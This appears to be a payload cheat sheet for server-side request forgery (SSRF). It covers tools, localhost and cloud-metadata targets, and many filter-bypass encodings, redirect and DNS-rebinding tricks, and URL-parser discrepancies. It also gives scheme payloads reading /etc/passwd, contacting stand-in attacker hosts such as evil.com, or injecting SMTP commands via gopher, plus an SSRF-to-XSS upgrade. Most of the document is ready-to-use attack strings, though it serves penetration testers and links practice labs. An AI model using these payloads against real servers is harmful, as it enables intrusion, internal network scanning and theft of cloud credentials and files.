Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
- Tools
- Methodology
- Bypassing Filters
- Default Targets
- Bypass Localhost with IPv6 Notation
- Bypass Localhost with a Domain Redirect
- Bypass Localhost with CIDR
- Bypass Using Rare Address
- Bypass Using an Encoded IP Address
- Bypass Using Different Encoding
- Bypassing Using a Redirect
- Bypass Using DNS Rebinding
- Bypass Abusing URL Parsing Discrepancy
- Bypass PHP filter_var() Function
- Bypass Using JAR Scheme
- Exploitation via URL Scheme
- Blind Exploitation
- Upgrade to XSS
- Labs
- References
- swisskyrepo/SSRFmap - Automatic SSRF fuzzer and exploitation tool
- tarunkant/Gopherus - Generates gopher link for exploiting SSRF and gaining RCE in various servers
- In3tinct/See-SURF - Python based scanner to find potential SSRF parameters
- teknogeek/SSRF-Sheriff - Simple SSRF-testing sheriff written in Go
- assetnote/surf - Returns a list of viable SSRF candidates
- dwisiswant0/ipfuscator - A blazing-fast, thread-safe, straightforward and zero memory allocations tool to swiftly generate alternative IP(v4) address representations in Go.
- Horlad/r3dir - a redirection service designed to help bypass SSRF filters that do not validate the redirect location. Intergrated with Burp with help of Hackvertor tags
SSRF is a security vulnerability that occurs when an attacker manipulates a server to make HTTP requests to an unintended location. This happens when the server processes user-provided URLs or IP addresses without proper validation.
Common exploitation paths:
- Accessing Cloud metadata
- Leaking files on the server
- Network discovery, port scanning with the SSRF
- Sending packets to specific services on the network, usually to achieve a Remote Command Execution on another server
Example: A server accepts user input to fetch a URL.
url = input("Enter URL:")
response = requests.get(url)
return response
An attacker supplies a malicious input:
http://169.254.169.254/latest/meta-data/
This fetches sensitive information from the AWS EC2 metadata service.
By default, Server-Side Request Forgery are used to access services hosted on localhost
or hidden further on the network.
- Using
localhost
http://localhost:80 http://localhost:22 https://localhost:443
- Using
127.0.0.1
http://127.0.0.1:80 http://127.0.0.1:22 https://127.0.0.1:443
- Using
0.0.0.0
http://0.0.0.0:80 http://0.0.0.0:22 https://0.0.0.0:443
-
Using unspecified address in IPv6
[::]
http://[::]:80/
-
Using IPv6 loopback addres
[0000::1]
http://[0000::1]:80/
-
Using IPv6/IPv4 Address Embedding
http://[0:0:0:0:0:ffff:127.0.0.1] http://[::ffff:127.0.0.1]
Domain | Redirect to |
---|---|
localtest.me | ::1 |
localh.st | 127.0.0.1 |
spoofed.[BURP_COLLABORATOR] | 127.0.0.1 |
spoofed.redacted.oastify.com | 127.0.0.1 |
company.127.0.0.1.nip.io | 127.0.0.1 |
The service nip.io
is awesome for that, it will convert any ip address as a dns.
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
The IP range 127.0.0.0/8
in IPv4 is reserved for loopback addresses.
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
If you try to use any address in this range (127.0.0.2, 127.1.1.1, etc.) in a network, it will still resolve to the local machine
You can short-hand IP addresses by dropping the zeros
http://0/
http://127.1
http://127.0.1
-
Decimal IP location
http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 http://2852039166/ = http://169.254.169.254
-
Octal IP: Implementations differ on how to handle octal format of IPv4.
http://0177.0.0.1/ = http://127.0.0.1 http://o177.0.0.1/ = http://127.0.0.1 http://0o177.0.0.1/ = http://127.0.0.1 http://q177.0.0.1/ = http://127.0.0.1
-
URL encoding: Single or double encode a specific URL to bypass blacklist
http://127.0.0.1/%61dmin http://127.0.0.1/%2561dmin
-
Enclosed alphanumeric:
①②③④⑤⑥⑦⑧⑨⑩⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽⑾⑿⒀⒁⒂⒃⒄⒅⒆⒇⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑⒒⒓⒔⒕⒖⒗⒘⒙⒚⒛⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ⓪⓫⓬⓭⓮⓯⓰⓱⓲⓳⓴⓵⓶⓷⓸⓹⓺⓻⓼⓽⓾⓿
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
-
Unicode encoding: In some languages (.NET, Python 3) regex supports unicode by default.
\d
includes0123456789
but also๐๑๒๓๔๕๖๗๘๙
.
- Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)
- Launch the SSRF pointing to
vulnerable.com/index.php?url=http://redirect-server
- You can use response codes HTTP 307 and HTTP 308 in order to retain HTTP method and body after the redirection.
To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use Horlad/r3dir.
-
Redirects to
http://localhost
with307 Temporary Redirect
status codehttps://307.r3dir.me/--to/?url=http://localhost
-
Redirects to
http://169.254.169.254/latest/meta-data/
with302 Found
status codehttps://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me
Create a domain that change between two IPs.
- 1u.ms - DNS rebinding utility
For example to rotate between 1.2.3.4
and 169.254-169.254
, use the following domain:
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
Verify the address with nslookup
.
$ nslookup make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
Name: make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
Address: 1.2.3.4
$ nslookup make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
Name: make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
Address: 169.254.169.254
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
Parsing behavior by different libraries: http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2
treats1.1.1.1
as the destinationrequests
and browsers redirect to2.2.2.2
urllib
resolves to3.3.3.3
In PHP 7.0.25, filter_var()
function with the parameter FILTER_VALIDATE_URL
allows URL such as:
http://test???test.com
0://evil.com:80;http://google.com:80/
<?php
echo var_dump(filter_var("http://test???test.com", FILTER_VALIDATE_URL));
echo var_dump(filter_var("0://evil.com;google.com", FILTER_VALIDATE_URL));
?>
This attack technique is fully blind, you won't see the result.
jar:scheme://domain/path!/
jar:http://127.0.0.1!/
jar:https://127.0.0.1!/
jar:ftp://127.0.0.1!/
Allows an attacker to fetch the content of a file on the server. Transforming the SSRF into a file read.
file:///etc/passwd
file://\/\/etc/passwd
Allows an attacker to fetch any content from the web, it can also be used to scan ports.
ssrf.php?url=http://127.0.0.1:22
ssrf.php?url=http://127.0.0.1:80
ssrf.php?url=http://127.0.0.1:443
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
A network protocol used for secure file transfer over secure shell
ssrf.php?url=sftp://evil.com:11111/
Trivial File Transfer Protocol, works over UDP
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Wrapper for Java when your payloads struggle with "\n
" and "\r
" characters.
ssrf.php?url=netdoc:///etc/passwd
The gopher://
protocol is a lightweight, text-based protocol that predates the modern World Wide Web. It was designed for distributing, searching, and retrieving documents over the Internet.
gopher://[host]:[port]/[type][selector]
This scheme is very useful as it as be used to send data to TCP protocol.
gopher://localhost:25/_MAIL%20FROM:<attacker@example.com>%0D%0A
Refer to the SSRF Advanced Exploitation to explore the gopher://
protocol deeper.
When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read.
Use an SSRF chain to gain an Out-of-Band output: assetnote/blind-ssrf-chains
Possible via HTTP(s)
- Elasticsearch
- Weblogic
- Hashicorp Consul
- Shellshock
- Apache Druid
- Apache Solr
- PeopleSoft
- Apache Struts
- JBoss
- Confluence
- Jira
- Other Atlassian Products
- OpenTSDB
- Jenkins
- Hystrix Dashboard
- W3 Total Cache
- Docker
- Gitlab Prometheus Redis Exporter
Possible via Gopher
When the SSRF doesn't have any critical impact, the network is segmented and you can't reach other machine, the SSRF doesn't allow you to exfiltrate files from the server.
You can try to upgrade the SSRF to an XSS, by including an SVG file containing Javascript code.
https://example.com/ssrf.php?url=http://brutelogic.com.br/poc.svg
- PortSwigger - Basic SSRF against the local server
- PortSwigger - Basic SSRF against another back-end system
- PortSwigger - SSRF with blacklist-based input filter
- PortSwigger - SSRF with whitelist-based input filter
- PortSwigger - SSRF with filter bypass via open redirection vulnerability
- Root Me - Server Side Request Forgery
- Root Me - Nginx - SSRF Misconfiguration
- A New Era Of SSRF - Exploiting URL Parsers - Orange Tsai - September 27, 2017
- Blind SSRF on errors.hackerone.net - chaosbolt - June 30, 2018
- ESEA Server-Side Request Forgery and Querying AWS Meta Data - Brett Buerhaus - April 18, 2016
- Hacker101 SSRF - Cody Brocious - October 29, 2018
- Hackerone - How To: Server-Side Request Forgery (SSRF) - Jobert Abma - June 14, 2017
- Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity - December 17, 2017
- How I Chained 4 Vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai - July 28, 2017
- Les Server Side Request Forgery : Comment contourner un pare-feu - Geluchat - September 16, 2017
- PHP SSRF - @secjuice - theMiddle - March 1, 2018
- Piercing the Veil: Server Side Request Forgery to NIPRNet Access - Alyssa Herrera - April 9, 2018
- Server-side Browsing Considered Harmful - Nicolas Grégoire (Agarri) - May 21, 2015
- SSRF - Server-Side Request Forgery (Types and Ways to Exploit It) Part-1 - SaN ThosH (madrobot) - January 10, 2019
- SSRF and Local File Read in Video to GIF Converter - sl1m - February 11, 2016
- SSRF in https://imgur.com/vidgif/url - Eugene Farfel (aesteral) - February 10, 2016
- SSRF in proxy.duckduckgo.com - Patrik Fábián (fpatrik) - May 27, 2018
- SSRF on *shopifycloud.com - Rojan Rijal (rijalrojan) - July 17, 2018
- SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP - Willis Vandevanter (@0xrst) - February 5, 2019
- SSRF Tips - xl7dev - July 3, 2016
- SSRF's Up! Real World Server-Side Request Forgery (SSRF) - Alberto Wilson and Guillermo Gabarrin - January 25, 2019
- SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例 - mrtc0 - September 5, 2018
- SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - June 12, 2019
- URL Eccentricities in Java - sammy (@PwnL0rd) - November 2, 2020
- Web Security Academy Server-Side Request Forgery (SSRF) - PortSwigger - July 10, 2019
- X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG (@quanyang) - June 22, 2016